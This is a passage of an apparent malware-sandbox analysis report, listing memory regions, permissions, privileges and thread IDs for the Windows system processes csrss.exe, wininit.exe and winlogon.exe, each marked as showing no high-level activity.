0x
1D8
0x
1A8
0x
188
0x
184
0x
180
0x
160
0x
158
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| locale.nls | 0xc680000000 | 0xc6800bdfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000c6800c0000 | 0xc6800c0000 | 0xc680240fff | Pagefile Backed Memory | r |
|
|
|
- |
| csrss.exe.mui | 0xc6b0f10000 | 0xc6b0f10fff | Memory Mapped File | r |
|
|
|
- |
| winsrv.dll.mui | 0xc6b0f20000 | 0xc6b0f21fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000c6b0f30000 | 0xc6b0f30000 | 0xc6b0f43fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000c6b0f50000 | 0xc6b0f50000 | 0xc6b0f5ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| marlett.ttf | 0xc6b0f60000 | 0xc6b0f66fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000c6b0f70000 | 0xc6b0f70000 | 0xc6b0f87fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000c6b0f90000 | 0xc6b0f90000 | 0xc6b0f96fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000c6b0fa0000 | 0xc6b0fa0000 | 0xc6b0faffff | Pagefile Backed Memory | rw |
|
|
|
- |
| vgaoem.fon | 0xc6b0fb0000 | 0xc6b0fb1fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000c6b0fc0000 | 0xc6b0fc0000 | 0xc6b0fcffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000c6b0fd0000 | 0xc6b0fd0000 | 0xc6b0fd0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000c6b0fd0000 | 0xc6b0fd0000 | 0xc6b0fdffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000c6b0fe0000 | 0xc6b0fe0000 | 0xc6b0fe0fff | Private Memory | rw |
|
|
|
- |
| vgasys.fon | 0xc6b0ff0000 | 0xc6b0ff1fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000c6b1000000 | 0xc6b1000000 | 0xc6b10fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000c6b1100000 | 0xc6b1100000 | 0xc6b113ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000c6b1140000 | 0xc6b1140000 | 0xc6b117ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000c6b1180000 | 0xc6b1180000 | 0xc6b11bffff | Private Memory | rw |
|
|
|
- |
| private_0x000000c6b11c0000 | 0xc6b11c0000 | 0xc6b11fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000c6b1200000 | 0xc6b1200000 | 0xc6b1387fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000c6b1390000 | 0xc6b1390000 | 0xc6b1390fff | Private Memory | rw |
|
|
|
- |
| private_0x000000c6b13a0000 | 0xc6b13a0000 | 0xc6b13dffff | Private Memory | rw |
|
|
|
- |
| private_0x000000c6b13e0000 | 0xc6b13e0000 | 0xc6b141ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000c6b1420000 | 0xc6b1420000 | 0xc6b145ffff | Private Memory | rw |
|
|
|
- |
| segoeui.ttf | 0xc6b1460000 | 0xc6b153efff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000c6b1540000 | 0xc6b1540000 | 0xc6b156ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000c6b1570000 | 0xc6b1570000 | 0xc6b296ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000c6b2970000 | 0xc6b2970000 | 0xc6b2970fff | Private Memory | rw |
|
|
|
- |
| private_0x000000c6b2980000 | 0xc6b2980000 | 0xc6b2980fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000c6b2990000 | 0xc6b2990000 | 0xc6b299ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000c6b29a0000 | 0xc6b29a0000 | 0xc6b29affff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000c6b29b0000 | 0xc6b29b0000 | 0xc6b29bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000c6b29c0000 | 0xc6b29c0000 | 0xc6b29cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000c6b29d0000 | 0xc6b29d0000 | 0xc6b29dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000c6b29e0000 | 0xc6b29e0000 | 0xc6b2a1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000c6b2a20000 | 0xc6b2a20000 | 0xc6b2adffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000c6b2ae0000 | 0xc6b2ae0000 | 0xc6b2aeffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000c6b2af0000 | 0xc6b2af0000 | 0xc6b2baffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000c6b2bb0000 | 0xc6b2bb0000 | 0xc6b2bbffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000c6b2bc0000 | 0xc6b2bc0000 | 0xc6b2bcffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000c6b2bd0000 | 0xc6b2bd0000 | 0xc6b2bdffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000c6b2be0000 | 0xc6b2be0000 | 0xc6b2beffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000c6b2bf0000 | 0xc6b2bf0000 | 0xc6b2caffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000c6b2cb0000 | 0xc6b2cb0000 | 0xc6b2cbffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000c6b2cc0000 | 0xc6b2cc0000 | 0xc6b2ccffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000c6b2cd0000 | 0xc6b2cd0000 | 0xc6b2cdffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000c6b2ce0000 | 0xc6b2ce0000 | 0xc6b2d1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000c6b2ce0000 | 0xc6b2ce0000 | 0xc6b2ce0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000c6b2d20000 | 0xc6b2d20000 | 0xc6b2d2ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000c6b2d30000 | 0xc6b2d30000 | 0xc6b2d3ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| dosapp.fon | 0xc6b2d50000 | 0xc6b2d58fff | Memory Mapped File | r |
|
|
|
- |
| cga40woa.fon | 0xc6b2d60000 | 0xc6b2d61fff | Memory Mapped File | r |
|
|
|
- |
| cga80woa.fon | 0xc6b2d70000 | 0xc6b2d71fff | Memory Mapped File | r |
|
|
|
- |
| ega40woa.fon | 0xc6b2d80000 | 0xc6b2d82fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000c6b2d90000 | 0xc6b2d90000 | 0xc6b2d9ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff120000 | 0x7df5ff120000 | 0x7ff5ff11ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff655b48000 | 0x7ff655b48000 | 0x7ff655b49fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff655b4a000 | 0x7ff655b4a000 | 0x7ff655b4bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff655b4c000 | 0x7ff655b4c000 | 0x7ff655b4dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff655b4e000 | 0x7ff655b4e000 | 0x7ff655b4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff655b50000 | 0x7ff655b50000 | 0x7ff655c4ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00007ff655c50000 | 0x7ff655c50000 | 0x7ff655c72fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff655c73000 | 0x7ff655c73000 | 0x7ff655c74fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff655c75000 | 0x7ff655c75000 | 0x7ff655c76fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff655c77000 | 0x7ff655c77000 | 0x7ff655c78fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff655c79000 | 0x7ff655c79000 | 0x7ff655c79fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff655c7a000 | 0x7ff655c7a000 | 0x7ff655c7bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff655c7e000 | 0x7ff655c7e000 | 0x7ff655c7ffff | Private Memory | rw |
|
|
|
- |
| csrss.exe | 0x7ff6560d0000 | 0x7ff6560d6fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffaf4290000 | 0x7ffaf42fafff | Memory Mapped File | rwx |
|
|
|
- |
| sxs.dll | 0x7ffaf4300000 | 0x7ffaf4397fff | Memory Mapped File | rwx |
|
|
|
- |
| sxssrv.dll | 0x7ffaf43b0000 | 0x7ffaf43bcfff | Memory Mapped File | rwx |
|
|
|
- |
| winsrv.dll | 0x7ffaf43c0000 | 0x7ffaf43f4fff | Memory Mapped File | rwx |
|
|
|
- |
| basesrv.dll | 0x7ffaf4400000 | 0x7ffaf4413fff | Memory Mapped File | rwx |
|
|
|
- |
| csrsrv.dll | 0x7ffaf4420000 | 0x7ffaf4434fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffaf4e50000 | 0x7ffaf502cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffaf5140000 | 0x7ffaf528dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffaf5290000 | 0x7ffaf53b5fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffaf5800000 | 0x7ffaf5984fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffaf70d0000 | 0x7ffaf717cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
Process #35: wininit.exe
0
0
| Information | Value |
|---|---|
| ID | #35 |
| File Name | c:\windows\system32\wininit.exe |
| Command Line | wininit.exe |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x194 |
| Parent PID | 0xffffffffffffffff (Unknown) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeTcbPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
224
0x
1D4
0x
1AC
0x
198
|
Process #36: csrss.exe
0
0
| Information | Value |
|---|---|
| ID | #36 |
| File Name | c:\windows\system32\csrss.exe |
| Command Line | %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x19c |
| Parent PID | 0xffffffffffffffff (Unknown) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
4C0
0x
2B4
0x
220
0x
21C
0x
1F8
0x
1C8
0x
1C4
0x
1C0
0x
1BC
0x
1B8
0x
1A0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| locale.nls | 0x9800000000 | 0x98000bdfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000098000c0000 | 0x98000c0000 | 0x9800240fff | Pagefile Backed Memory | r |
|
|
|
- |
| winsrv.dll.mui | 0x9822b30000 | 0x9822b31fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000009822b40000 | 0x9822b40000 | 0x9822b4ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009822b50000 | 0x9822b50000 | 0x9822b63fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000009822b70000 | 0x9822b70000 | 0x9822b7ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| marlett.ttf | 0x9822b80000 | 0x9822b86fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000009822b90000 | 0x9822b90000 | 0x9822ba7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000009822bb0000 | 0x9822bb0000 | 0x9822bb0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009822bc0000 | 0x9822bc0000 | 0x9822bc0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000009822bd0000 | 0x9822bd0000 | 0x9822bd6fff | Private Memory | rw |
|
|
|
- |
| private_0x0000009822be0000 | 0x9822be0000 | 0x9822be0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000009822bf0000 | 0x9822bf0000 | 0x9822bf1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000009822c00000 | 0x9822c00000 | 0x9822cfffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000009822d00000 | 0x9822d00000 | 0x9822d0ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009822d10000 | 0x9822d10000 | 0x9822d1ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009822d20000 | 0x9822d20000 | 0x9822d2ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009822d30000 | 0x9822d30000 | 0x9822d3ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000009822d40000 | 0x9822d40000 | 0x9822d7ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000009822d80000 | 0x9822d80000 | 0x9822d8ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009822d90000 | 0x9822d90000 | 0x9822d9ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009822da0000 | 0x9822da0000 | 0x9822daffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009822db0000 | 0x9822db0000 | 0x9822dbffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009822dc0000 | 0x9822dc0000 | 0x9822dcffff | Pagefile Backed Memory | rw |
|
|
|
- |
| segmdl2.ttf | 0x9822dd0000 | 0x9822df3fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000009822e00000 | 0x9822e00000 | 0x9822e00fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009822e10000 | 0x9822e10000 | 0x9822e48fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009822e50000 | 0x9822e50000 | 0x9822e5ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009822e60000 | 0x9822e60000 | 0x9822e6ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009822e70000 | 0x9822e70000 | 0x9822e70fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009822e80000 | 0x9822e80000 | 0x9822e8ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009822e90000 | 0x9822e90000 | 0x9822e9ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| vgaoem.fon | 0x9822ea0000 | 0x9822ea1fff | Memory Mapped File | r |
|
|
|
- |
| dosapp.fon | 0x9822eb0000 | 0x9822eb8fff | Memory Mapped File | r |
|
|
|
- |
| cga40woa.fon | 0x9822ec0000 | 0x9822ec1fff | Memory Mapped File | r |
|
|
|
- |
| cga80woa.fon | 0x9822ed0000 | 0x9822ed1fff | Memory Mapped File | r |
|
|
|
- |
| ega40woa.fon | 0x9822ee0000 | 0x9822ee2fff | Memory Mapped File | r |
|
|
|
- |
| consola.ttf | 0x9822ef0000 | 0x9822f58fff | Memory Mapped File | r |
|
|
|
- |
| consolab.ttf | 0x9822f60000 | 0x9822fbafff | Memory Mapped File | r |
|
|
|
- |
| consolai.ttf | 0x9822fc0000 | 0x982302afff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000009823030000 | 0x9823030000 | 0x982303ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009823040000 | 0x9823040000 | 0x982304ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009823050000 | 0x9823050000 | 0x982305ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009823060000 | 0x9823060000 | 0x982306ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009823070000 | 0x9823070000 | 0x982307ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009823080000 | 0x9823080000 | 0x982308ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009823090000 | 0x9823090000 | 0x982309ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000098230a0000 | 0x98230a0000 | 0x98230affff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000098230b0000 | 0x98230b0000 | 0x98230bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000098230c0000 | 0x98230c0000 | 0x98230cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000098230d0000 | 0x98230d0000 | 0x98230dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000098230e0000 | 0x98230e0000 | 0x98230e4fff | Pagefile Backed Memory | rw |
|
|
|
- |
| segoeuib.ttf | 0x98230f0000 | 0x98231cbfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000098231d0000 | 0x98231d0000 | 0x98231dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000098231e0000 | 0x98231e0000 | 0x98231effff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000098231f0000 | 0x98231f0000 | 0x98231fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009823200000 | 0x9823200000 | 0x982320ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009823210000 | 0x9823210000 | 0x982321ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009823220000 | 0x9823220000 | 0x982322ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009823220000 | 0x9823220000 | 0x9823220fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009823230000 | 0x9823230000 | 0x982323ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009823240000 | 0x9823240000 | 0x982324ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009823250000 | 0x9823250000 | 0x982325ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009823250000 | 0x9823250000 | 0x9823250fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009823260000 | 0x9823260000 | 0x982326ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009823270000 | 0x9823270000 | 0x982327ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000009823280000 | 0x9823280000 | 0x9823280fff | Private Memory | rw |
|
|
|
- |
| vgasys.fon | 0x9823290000 | 0x9823291fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000098232a0000 | 0x98232a0000 | 0x98232dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000098232e0000 | 0x98232e0000 | 0x982331ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000009823320000 | 0x9823320000 | 0x982335ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000009823360000 | 0x9823360000 | 0x98234e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000098234f0000 | 0x98234f0000 | 0x98234f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000009823500000 | 0x9823500000 | 0x982353ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000009823540000 | 0x9823540000 | 0x982357ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000009823580000 | 0x9823580000 | 0x98235bffff | Private Memory | rw |
|
|
|
- |
| segoeui.ttf | 0x98235c0000 | 0x982369efff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000098236a0000 | 0x98236a0000 | 0x98236cffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000098236d0000 | 0x98236d0000 | 0x9824acffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000009824ad0000 | 0x9824ad0000 | 0x9824b0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000009824b10000 | 0x9824b10000 | 0x9824b10fff | Private Memory | rw |
|
|
|
- |
| private_0x0000009824b20000 | 0x9824b20000 | 0x9824b20fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000009824b30000 | 0x9824b30000 | 0x9824b3ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009824b40000 | 0x9824b40000 | 0x9824b4ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000009824b50000 | 0x9824b50000 | 0x9824b8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000009824b50000 | 0x9824b50000 | 0x9824b5ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009824b60000 | 0x9824b60000 | 0x9824b6ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009824b70000 | 0x9824b70000 | 0x9824b7ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009824b80000 | 0x9824b80000 | 0x9824b8ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009824b90000 | 0x9824b90000 | 0x9825081fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009825090000 | 0x9825090000 | 0x982509ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000098250a0000 | 0x98250a0000 | 0x98250affff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000098250b0000 | 0x98250b0000 | 0x98250bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000098250c0000 | 0x98250c0000 | 0x98250cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000098250d0000 | 0x98250d0000 | 0x98250dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000098250e0000 | 0x98250e0000 | 0x98250effff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000098250f0000 | 0x98250f0000 | 0x98250fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009825100000 | 0x9825100000 | 0x982510ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009825110000 | 0x9825110000 | 0x982511ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009825120000 | 0x9825120000 | 0x982512ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009825130000 | 0x9825130000 | 0x9825130fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009825130000 | 0x9825130000 | 0x982513ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009825140000 | 0x9825140000 | 0x982514ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009825150000 | 0x9825150000 | 0x9825150fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009825150000 | 0x9825150000 | 0x982515ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009825160000 | 0x9825160000 | 0x982516ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009825170000 | 0x9825170000 | 0x982517ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009825180000 | 0x9825180000 | 0x982518ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009825290000 | 0x9825290000 | 0x982548efff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000009825490000 | 0x9825490000 | 0x982568efff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff190000 | 0x7df5ff190000 | 0x7ff5ff18ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff655156000 | 0x7ff655156000 | 0x7ff655157fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff655158000 | 0x7ff655158000 | 0x7ff655159fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff65515a000 | 0x7ff65515a000 | 0x7ff65515bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff65515c000 | 0x7ff65515c000 | 0x7ff65515dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff65515e000 | 0x7ff65515e000 | 0x7ff65515ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff655160000 | 0x7ff655160000 | 0x7ff65525ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00007ff655260000 | 0x7ff655260000 | 0x7ff655282fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff655284000 | 0x7ff655284000 | 0x7ff655285fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff655286000 | 0x7ff655286000 | 0x7ff655286fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff655288000 | 0x7ff655288000 | 0x7ff655289fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff65528a000 | 0x7ff65528a000 | 0x7ff65528bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff65528e000 | 0x7ff65528e000 | 0x7ff65528ffff | Private Memory | rw |
|
|
|
- |
| csrss.exe | 0x7ff6560d0000 | 0x7ff6560d6fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffaf4290000 | 0x7ffaf42fafff | Memory Mapped File | rwx |
|
|
|
- |
| sxs.dll | 0x7ffaf4300000 | 0x7ffaf4397fff | Memory Mapped File | rwx |
|
|
|
- |
| sxssrv.dll | 0x7ffaf43b0000 | 0x7ffaf43bcfff | Memory Mapped File | rwx |
|
|
|
- |
| winsrv.dll | 0x7ffaf43c0000 | 0x7ffaf43f4fff | Memory Mapped File | rwx |
|
|
|
- |
| basesrv.dll | 0x7ffaf4400000 | 0x7ffaf4413fff | Memory Mapped File | rwx |
|
|
|
- |
| csrsrv.dll | 0x7ffaf4420000 | 0x7ffaf4434fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffaf4e50000 | 0x7ffaf502cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffaf5140000 | 0x7ffaf528dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffaf5290000 | 0x7ffaf53b5fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffaf5800000 | 0x7ffaf5984fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffaf70d0000 | 0x7ffaf717cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
Process #37: winlogon.exe
0
0
| Information | Value |
|---|---|
| ID | #37 |
| File Name | c:\windows\system32\winlogon.exe |
| Command Line | winlogon.exe |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1cc |
| Parent PID | 0xffffffffffffffff (Unknown) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
